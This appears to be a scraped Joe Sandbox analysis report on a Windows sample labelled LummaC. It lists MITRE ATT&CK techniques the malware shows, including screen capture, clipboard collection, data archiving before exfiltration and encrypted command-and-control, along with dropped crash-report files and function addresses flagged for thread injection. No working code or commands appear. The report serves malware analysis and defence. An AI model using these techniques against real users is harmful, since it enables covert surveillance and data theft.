Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mWAik6b.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_mWAik6b.exe_a7fd83d59ed2df8d43c4fb3810d1dbe838887ce9_5e5638ff_9adb1ad0-0525-4e47-848b-7c5f41c29b2d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E41.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F8B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FAB.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Windows Analysis Report
mWAik6b.exe

Function 024A7F65 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 024A80E2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 008C2880 Relevance: 1.7, APIs: 1, Instructions: 242
COMMON

Function 008C2104 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043A5E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 645
memorycomCOMMON

Function 004361B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 136
COMMON

Function 00420BA0 Relevance: 16.7, Strings: 13, Instructions: 451
COMMON

Function 00424050 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 575
COMMON

Function 004086B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 190
threadCOMMON

Function 00427A00 Relevance: 5.3, Strings: 4, Instructions: 324
COMMON

Function 0042E2AC Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 415
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre